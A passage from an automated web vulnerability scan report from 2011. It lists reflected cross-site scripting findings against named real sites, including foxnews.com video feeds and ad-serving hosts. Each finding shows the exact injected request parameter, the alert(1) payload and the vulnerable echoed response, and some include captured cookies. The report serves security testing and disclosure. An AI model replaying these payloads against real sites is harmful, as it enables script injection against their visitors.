Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=0Cvz402XsBKiaCsFO2ZHAg==

Response (redirected)

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 11 Apr 2011 16:41:19 GMT
Content-Type: application/x-javascript
Connection: close
Content-Length: 185

document.write('<img width="0" height="0" src="http://tag.admeld.com/match9d23e'-alert(1)-'a7e3cfc3d3f?admeld_adprovider_id=338&external_user_id=E3F32BD012B0974D052B68A20247663B"/>');


1.106. http://um.simpli.fi/am_redirect_js [admeld_adprovider_id parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://um.simpli.fi
Path:   /am_redirect_js

Issue detail

The value of the admeld_adprovider_id request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d7d3b'-alert(1)-'3a651942118 was submitted in the admeld_adprovider_id parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /am_redirect_js?admeld_user_id=e36a2f20-9985-4dcd-82e9-6ff0312e024e&admeld_adprovider_id=338d7d3b'-alert(1)-'3a651942118&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match HTTP/1.1
Host: um.simpli.fi
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/3/foxnews/728x90/politics?t=1302540075597&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html&refer=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=0Cvz402XsBKiaCsFO2ZHAg==

Response (redirected)

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 11 Apr 2011 16:41:19 GMT
Content-Type: application/x-javascript
Connection: close
Content-Length: 185

document.write('<img width="0" height="0" src="http://tag.admeld.com/match?admeld_adprovider_id=338d7d3b'-alert(1)-'3a651942118&external_user_id=E3F32BD012B0974D052B68A20247663B"/>');


1.107. http://um.simpli.fi/am_redirect_js [admeld_callback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://um.simpli.fi
Path:   /am_redirect_js

Issue detail

The value of the admeld_callback request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a36db'-alert(1)-'88fe32dd8cb was submitted in the admeld_callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /am_redirect_js?admeld_user_id=e36a2f20-9985-4dcd-82e9-6ff0312e024e&admeld_adprovider_id=338&admeld_call_type=js&admeld_callback=http://tag.admeld.com/matcha36db'-alert(1)-'88fe32dd8cb HTTP/1.1
Host: um.simpli.fi
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/3/foxnews/728x90/politics?t=1302540075597&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html&refer=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=0Cvz402XsBKiaCsFO2ZHAg==

Response (redirected)

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 11 Apr 2011 16:41:19 GMT
Content-Type: application/x-javascript
Connection: close
Content-Length: 185

document.write('<img width="0" height="0" src="http://tag.admeld.com/matcha36db'-alert(1)-'88fe32dd8cb?admeld_adprovider_id=338&external_user_id=E3F32BD012B0974D052B68A20247663B"/>');


1.108. http://video.foxnews.com/v/feed/video/4636974.js [callback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://video.foxnews.com
Path:   /v/feed/video/4636974.js

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 3405c<script>alert(1)</script>5c1b265328d was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /v/feed/video/4636974.js?callback=videoPlayer.feed.parse_4796364g_dioediv3405c<script>alert(1)</script>5c1b265328d&template=grab&cb=201141112 HTTP/1.1
Host: video.foxnews.com
Proxy-Connection: keep-alive
Referer: http://www.foxnews.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: rsi_segs=D08734_70852; __qca=P0-166217050-1302538865283; __qseg=Q_D|Q_T|Q_2120|Q_2156|Q_2149|Q_2129|Q_2118|Q_2151|Q_2150|Q_919|Q_924|Q_929|Q_928|Q_922|Q_921; weatherloc=%7B%22location%22%3A%5B%7B%22loc_id%22%3A%22USNY0996%22%2C%22zip%22%3A%2210108%22%2C%22city%22%3A%22New%20York%22%2C%22state%22%3A%22NY%22%7D%5D%7D; s_pers=%20s_vnum%3D1305130865325%2526vn%253D1%7C1305130865325%3B%20s_invisit%3Dtrue%7C1302540665325%3B%20omtr_lv%3D1302538865329%7C1397146865329%3B%20omtr_lv_s%3DFirst%2520Visit%7C1302540665329%3B%20s_nr%3D1302538865334%7C1305130865334%3B; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: PHP/5.2.3-1ubuntu6.5
Content-Length: 3424
Content-Type: application/javascript
Cache-Control: max-age=300
Date: Mon, 11 Apr 2011 16:21:20 GMT
Connection: close

videoPlayer.feed.parse_4796364g_dioediv3405c<script>alert(1)</script>5c1b265328d({"@attributes":{"version":"2.0"},"channel":{"title":{},"link":{},"description":{},"language":"en-us","pubDate":"Mon, 11 Apr 2011 12:21:20 EDT","lastBuildDate":"Mon, 11 Apr 2011 12:21:20 EDT","generato
...[SNIP]...

1.109. http://video.foxnews.com/v/feed/video/4637817.js [callback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://video.foxnews.com
Path:   /v/feed/video/4637817.js

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 8ccd5<script>alert(1)</script>b3185344794 was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /v/feed/video/4637817.js?callback=videoPlayer.feed.parse_7187364g_dioediv8ccd5<script>alert(1)</script>b3185344794&template=grab&cb=201141112 HTTP/1.1
Host: video.foxnews.com
Proxy-Connection: keep-alive
Referer: http://www.foxnews.com/politics/index.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: rsi_segs=D08734_70852; __qca=P0-166217050-1302538865283; __qseg=Q_D|Q_T|Q_2120|Q_2156|Q_2149|Q_2129|Q_2118|Q_2151|Q_2150|Q_919|Q_924|Q_929|Q_928|Q_922|Q_921; weatherloc=%7B%22location%22%3A%5B%7B%22loc_id%22%3A%22USNY0996%22%2C%22zip%22%3A%2210108%22%2C%22city%22%3A%22New%20York%22%2C%22state%22%3A%22NY%22%7D%5D%7D; s_vi=[CS]v1|26D1953A050109CC-40000112E0004680[CE]; weatherdata_USNY0996=%7B%22weatherData%22%3A%7B%22days%22%3A%5B%7B%22lo%22%3A%2257%22%2C%22hi%22%3A%2272%22%2C%22image%22%3A%2272%22%7D%2C%7B%22lo%22%3A%2246%22%2C%22hi%22%3A%2259%22%2C%22image%22%3A%2282%22%7D%2C%7B%22lo%22%3A%2244%22%2C%22hi%22%3A%2251%22%2C%22image%22%3A%2287%22%7D%5D%2C%22country%22%3A%22United%20States%22%2C%22currentTemp%22%3A%2260%22%2C%22forecast%22%3A%22Mostly%20cloudy%20and%20windy%22%2C%22stateShort%22%3A%22NY%22%2C%22locationId%22%3A%22USNY0996%22%2C%22cityName%22%3A%22New%20York%22%7D%7D; s_pers=%20s_vnum%3D1305130865325%2526vn%253D1%7C1305130865325%3B%20s_invisit%3Dtrue%7C1302540668835%3B%20omtr_lv%3D1302538868837%7C1397146868837%3B%20omtr_lv_s%3DFirst%2520Visit%7C1302540668837%3B%20s_nr%3D1302538868843%7C1305130868843%3B; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3Dfnc%253Aroot%253Aroot%253Achannel%255E%255EPolitics%255E%255Efnc%253Aroot%253Aroot%253Achannel%2520%257C%2520Politics%255E%255E%3B%20s_sq%3Dfoxnews%253D%252526pid%25253Dfnc%2525253Aroot%2525253Aroot%2525253Achannel%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.foxnews.com/politics/index.html%252526ot%25253DA%3B

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: PHP/5.2.3-1ubuntu6.5
Content-Length: 3691
Content-Type: application/javascript
Cache-Control: max-age=300
Date: Mon, 11 Apr 2011 16:21:34 GMT
Connection: close

videoPlayer.feed.parse_7187364g_dioediv8ccd5<script>alert(1)</script>b3185344794({"@attributes":{"version":"2.0"},"channel":{"title":{},"link":{},"description":{},"language":"en-us","pubDate":"Mon, 11 Apr 2011 12:21:34 EDT","lastBuildDate":"Mon, 11 Apr 2011 12:21:34 EDT","generato
...[SNIP]...

1.110. http://video.foxnews.com/v/feed/video/4637903.js [callback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://video.foxnews.com
Path:   /v/feed/video/4637903.js

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload e4c1f<script>alert(1)</script>00880e542be was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /v/feed/video/4637903.js?callback=videoPlayer.feed.parse_3097364g_dioedive4c1f<script>alert(1)</script>00880e542be&template=grab&cb=201141112 HTTP/1.1
Host: video.foxnews.com
Proxy-Connection: keep-alive
Referer: http://www.foxnews.com/politics/index.html
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-166217050-1302538865283; weatherloc=%7B%22location%22%3A%5B%7B%22loc_id%22%3A%22USNY0996%22%2C%22zip%22%3A%2210108%22%2C%22city%22%3A%22New%20York%22%2C%22state%22%3A%22NY%22%7D%5D%7D; s_vi=[CS]v1|26D1953A050109CC-40000112E0004680[CE]; weatherdata_USNY0996=%7B%22weatherData%22%3A%7B%22days%22%3A%5B%7B%22lo%22%3A%2257%22%2C%22hi%22%3A%2272%22%2C%22image%22%3A%2272%22%7D%2C%7B%22lo%22%3A%2246%22%2C%22hi%22%3A%2259%22%2C%22image%22%3A%2282%22%7D%2C%7B%22lo%22%3A%2244%22%2C%22hi%22%3A%2251%22%2C%22image%22%3A%2287%22%7D%5D%2C%22country%22%3A%22United%20States%22%2C%22currentTemp%22%3A%2260%22%2C%22forecast%22%3A%22Mostly%20cloudy%20and%20windy%22%2C%22stateShort%22%3A%22NY%22%2C%22locationId%22%3A%22USNY0996%22%2C%22cityName%22%3A%22New%20York%22%7D%7D; __qseg=Q_D|Q_T|Q_2120|Q_2156|Q_2149|Q_2129|Q_2118|Q_2151|Q_2150|Q_919|Q_924|Q_929|Q_928|Q_922|Q_921; s_pers=%20s_vnum%3D1305130865325%2526vn%253D1%7C1305130865325%3B%20s_invisit%3Dtrue%7C1302540673464%3B%20omtr_lv%3D1302538873468%7C1397146873468%3B%20omtr_lv_s%3DFirst%2520Visit%7C1302540673468%3B%20s_nr%3D1302538873476%7C1305130873476%3B; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; p_DQS=e30%3D%205c0d1f27263717ce10d0a1c64361f825b5c87b56%201302538201; rsi_segs=D08734_70852|E05510_10451

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: PHP/5.2.3-1ubuntu6.5
Content-Length: 3507
Content-Type: application/javascript
Cache-Control: max-age=300
Date: Mon, 11 Apr 2011 16:31:30 GMT
Connection: close

videoPlayer.feed.parse_3097364g_dioedive4c1f<script>alert(1)</script>00880e542be({"@attributes":{"version":"2.0"},"channel":{"title":{},"link":{},"description":{},"language":"en-us","pubDate":"Mon, 11 Apr 2011 12:31:27 EDT","lastBuildDate":"Mon, 11 Apr 2011 12:31:27 EDT","generato
...[SNIP]...

1.111. http://video.foxnews.com/v/feed/video/4638065.js [callback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://video.foxnews.com
Path:   /v/feed/video/4638065.js

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 37528<script>alert(1)</script>7470e4c716a was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /v/feed/video/4638065.js?callback=videoPlayer.feed.parse_5608364g_dioediv37528<script>alert(1)</script>7470e4c716a&template=grab&cb=201141113 HTTP/1.1
Host: video.foxnews.com
Proxy-Connection: keep-alive
Referer: http://www.foxnews.com/politics/index.html
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-166217050-1302538865283; weatherloc=%7B%22location%22%3A%5B%7B%22loc_id%22%3A%22USNY0996%22%2C%22zip%22%3A%2210108%22%2C%22city%22%3A%22New%20York%22%2C%22state%22%3A%22NY%22%7D%5D%7D; s_vi=[CS]v1|26D1953A050109CC-40000112E0004680[CE]; weatherdata_USNY0996=%7B%22weatherData%22%3A%7B%22days%22%3A%5B%7B%22lo%22%3A%2257%22%2C%22hi%22%3A%2272%22%2C%22image%22%3A%2272%22%7D%2C%7B%22lo%22%3A%2246%22%2C%22hi%22%3A%2259%22%2C%22image%22%3A%2282%22%7D%2C%7B%22lo%22%3A%2244%22%2C%22hi%22%3A%2251%22%2C%22image%22%3A%2287%22%7D%5D%2C%22country%22%3A%22United%20States%22%2C%22currentTemp%22%3A%2260%22%2C%22forecast%22%3A%22Mostly%20cloudy%20and%20windy%22%2C%22stateShort%22%3A%22NY%22%2C%22locationId%22%3A%22USNY0996%22%2C%22cityName%22%3A%22New%20York%22%7D%7D; p_DQS=e30%3D%205c0d1f27263717ce10d0a1c64361f825b5c87b56%201302538201; rsi_segs=D08734_70852|E05510_10451; __qseg=Q_D|Q_T|Q_2120|Q_2156|Q_2149|Q_2129|Q_2118|Q_2151|Q_2150|Q_919|Q_924|Q_929|Q_928|Q_922|Q_921; s_pers=%20s_vnum%3D1305130865325%2526vn%253D1%7C1305130865325%3B%20s_invisit%3Dtrue%7C1302543673824%3B%20omtr_lv%3D1302541873827%7C1397149873827%3B%20omtr_lv_s%3DFirst%2520Visit%7C1302543673827%3B%20s_nr%3D1302541873831%7C1305133873831%3B; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: PHP/5.2.3-1ubuntu6.5
Content-Length: 3667
Content-Type: application/javascript
Cache-Control: max-age=300
Date: Mon, 11 Apr 2011 17:21:44 GMT
Connection: close

videoPlayer.feed.parse_5608364g_dioediv37528<script>alert(1)</script>7470e4c716a({"@attributes":{"version":"2.0"},"channel":{"title":{},"link":{},"description":{},"language":"en-us","pubDate":"Mon, 11 Apr 2011 13:21:44 EDT","lastBuildDate":"Mon, 11 Apr 2011 13:21:44 EDT","generato
...[SNIP]...

1.112. http://wcax.upickem.net/engine/Splash.aspx [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://wcax.upickem.net
Path:   /engine/Splash.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9d9ff'-alert(1)-'bb75a418f1c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /engine/Splash.aspx?contestid=17178&9d9ff'-alert(1)-'bb75a418f1c=1 HTTP/1.1
Host: wcax.upickem.net
Proxy-Connection: keep-alive
Referer: http://www.vermontopia.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 4.0.30319
Set-Cookie: contestid=17178; expires=Tue, 09-Apr-2041 12:31:30 GMT; path=/
Set-Cookie: UPETemporaryShoppingCartID17178=506952470-4/9/2011 8:31:30 AM; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/
Set-Cookie: 293976; expires=Tue, 09-Apr-2041 12:31:30 GMT; path=/
X-Powered-By: ASP.NET
P3P: CP="NOI DSP COR NID CUR PSDa OUR STP STA"
Date: Sat, 09 Apr 2011 12:31:30 GMT
Content-Length: 39277

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
if (intMode == 0) {
//User is not yet logged into UP and connecting to FB for the first time
window.location.href = '/engine/Splash.aspx?contestid=17178&9d9ff'-alert(1)-'bb75a418f1c=1&FBConnect=1';
} else if (intMode == 1) {
//User is already logged into Upickem but connecting to FB for the first time
window.location.href =
...[SNIP]...

1.113. http://wptz.placelocal.com/_js/ad.js.php [adWidth parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://wptz.placelocal.com
Path:   /_js/ad.js.php

Issue detail

The value of the adWidth request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b33f0"%3balert(1)//4cbe115c7e1 was submitted in the adWidth parameter. This input was echoed as b33f0";alert(1)//4cbe115c7e1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /_js/ad.js.php?clientID=7cbbc409ec990f19c78c75bd1e06f215&adWidth=300b33f0"%3balert(1)//4cbe115c7e1&adHeight=250&campaign_api=dispCamp.getNextCampaign&api_url=api.placelocal.com&domain_name=wptz.placelocal.com&tracking_url=tracking.placelocal.com HTTP/1.1
Host: wptz.placelocal.com
Proxy-Connection: keep-alive
Referer: http://www.wptz.com/news/27483035/detail.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Sat, 09 Apr 2011 12:31:25 GMT
Content-Type: text/javascript; charset=utf-8
Connection: keep-alive
X-Powered-By: PHP/5.3.2-1
Cache-Control: max-age=0
Expires: Sat, 09 Apr 2011 12:31:25 GMT
Vary: Accept-Encoding
Content-Length: 11077

var scripts_uufugb = document.getElementsByTagName('script');var scriptEl_uufugb = scripts_uufugb[ scripts_uufugb.length - 1 ];var scriptParent_uufugb = scriptEl_uufugb.parentNode;var queryString_uufu
...[SNIP]...
parent', allowScriptAccess: 'always' }; /* C4 */ var attributes = { id:'Ad_uufugb' }; var uniqueId = Math.ceil(Math.random()*500); /* C5 */var swfUrl = "http://"+domain_name_uufugb+"/flash/Ad_Frame_300b33f0";alert(1)//4cbe115c7e1.swf"; var firstParam = true; if (click_tag_uufugb != '') { swfUrl += (firstParam == true ? '?' : '&'); swfUrl += 'clickTag=' + click_tag_uufugb; firstParam = false; } if (random_uufugb != '') { swfUrl
...[SNIP]...

1.114. http://wptz.placelocal.com/_js/scriptloader.js.php [loadedparam parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://wptz.placelocal.com
Path:   /_js/scriptloader.js.php

Issue detail

The value of the loadedparam request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 11e33"%3balert(1)//87ea4282f21 was submitted in the loadedparam parameter. This input was echoed as 11e33";alert(1)//87ea4282f21 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /_js/scriptloader.js.php?version=&load_swfobject=true&load_flashdetect=false&loadedparam=011e33"%3balert(1)//87ea4282f21&suffix=_e6ugs2 HTTP/1.1
Host: wptz.placelocal.com
Proxy-Connection: keep-alive
Referer: http://www.wptz.com/news/27483035/detail.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Sat, 09 Apr 2011 12:31:34 GMT
Content-Type: text/javascript; charset=utf-8
Connection: keep-alive
X-Powered-By: PHP/5.3.2-1
Cache-Control: max-age=0
Expires: Sat, 09 Apr 2011 12:31:34 GMT
Vary: Accept-Encoding
Content-Length: 12583

var swfobject=function(){var w="undefined",OBJECT="object",SHOCKWAVE_FLASH="Shockwave Flash",SHOCKWAVE_FLASH_AX="ShockwaveFlash.ShockwaveFlash",FLASH_MIME_TYPE="application/x-shockwave-flash",EXPRESS_
...[SNIP]...
(storedAltContentId,true);if(ua.ie&&ua.win){storedAltContent.style.display="block"}}if(storedCallbackFn){storedCallbackFn(storedCallbackObj)}}isExpressInstallActive=false}}}}(); scriptsLoaded_e6ugs2(011e33";alert(1)//87ea4282f21);

1.115. http://wptz.placelocal.com/_js/scriptloader.js.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://wptz.placelocal.com
Path:   /_js/scriptloader.js.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8c73c"%3balert(1)//c2b1bed343 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 8c73c";alert(1)//c2b1bed343 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /_js/scriptloader.js.php?version=&load_swfobject=true&load_flashdetect=false&loadedparam=0&suffix=_e6/8c73c"%3balert(1)//c2b1bed343ugs2 HTTP/1.1
Host: wptz.placelocal.com
Proxy-Connection: keep-alive
Referer: http://www.wptz.com/news/27483035/detail.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Sat, 09 Apr 2011 12:31:39 GMT
Content-Type: text/javascript; charset=utf-8
Connection: keep-alive
X-Powered-By: PHP/5.3.2-1
Cache-Control: max-age=0
Expires: Sat, 09 Apr 2011 12:31:39 GMT
Vary: Accept-Encoding
Content-Length: 12583

var swfobject=function(){var w="undefined",OBJECT="object",SHOCKWAVE_FLASH="Shockwave Flash",SHOCKWAVE_FLASH_AX="ShockwaveFlash.ShockwaveFlash",FLASH_MIME_TYPE="application/x-shockwave-flash",EXPRESS_
...[SNIP]...
ility(storedAltContentId,true);if(ua.ie&&ua.win){storedAltContent.style.display="block"}}if(storedCallbackFn){storedCallbackFn(storedCallbackObj)}}isExpressInstallActive=false}}}}(); scriptsLoaded_e6/8c73c";alert(1)//c2b1bed343ugs2(0);

1.116. http://wptz.placelocal.com/_js/scriptloader.js.php [suffix parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://wptz.placelocal.com
Path:   /_js/scriptloader.js.php

Issue detail

The value of the suffix request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1470b"%3balert(1)//aba93548af6 was submitted in the suffix parameter. This input was echoed as 1470b";alert(1)//aba93548af6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /_js/scriptloader.js.php?version=&load_swfobject=true&load_flashdetect=false&loadedparam=0&suffix=_e6ugs21470b"%3balert(1)//aba93548af6 HTTP/1.1
Host: wptz.placelocal.com
Proxy-Connection: keep-alive
Referer: http://www.wptz.com/news/27483035/detail.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Sat, 09 Apr 2011 12:31:36 GMT
Content-Type: text/javascript; charset=utf-8
Connection: keep-alive
X-Powered-By: PHP/5.3.2-1
Cache-Control: max-age=0
Expires: Sat, 09 Apr 2011 12:31:36 GMT
Vary: Accept-Encoding
Content-Length: 12583

var swfobject=function(){var w="undefined",OBJECT="object",SHOCKWAVE_FLASH="Shockwave Flash",SHOCKWAVE_FLASH_AX="ShockwaveFlash.ShockwaveFlash",FLASH_MIME_TYPE="application/x-shockwave-flash",EXPRESS_
...[SNIP]...
ty(storedAltContentId,true);if(ua.ie&&ua.win){storedAltContent.style.display="block"}}if(storedCallbackFn){storedCallbackFn(storedCallbackObj)}}isExpressInstallActive=false}}}}(); scriptsLoaded_e6ugs21470b";alert(1)//aba93548af6(0);

1.117. http://www.internetrix.net/action/event_signup/1066 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.internetrix.net
Path:   /action/event_signup/1066

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload be0c7"><script>alert(1)</script>c3045ca88cd was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /actionbe0c7"><script>alert(1)</script>c3045ca88cd/event_signup/1066 HTTP/1.1
Host: www.internetrix.net
Proxy-Connection: keep-alive
Referer: http://www.internetrix.net/page/events/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
